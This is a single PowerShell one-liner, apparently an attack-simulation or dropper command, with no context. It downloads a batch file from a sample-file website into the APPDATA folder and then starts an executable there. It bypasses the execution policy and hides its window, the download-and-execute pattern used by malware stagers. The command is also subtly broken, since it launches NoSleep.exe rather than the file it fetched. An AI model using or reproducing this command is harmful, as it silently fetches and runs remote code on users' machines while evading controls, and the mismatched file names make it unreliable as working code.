powershell.exe -command "& {(New-Object System.Net.WebClient).DownloadFile('https://filesamples.com/samples/code/bat/check_internet_connection.bat',"$env:APPDATA\check_internet_connection.bat");Start-Process ("$env:APPDATA\NoSleep.exe")}" -ExecutionPolicy bypass -noprofile -windowstyle hidden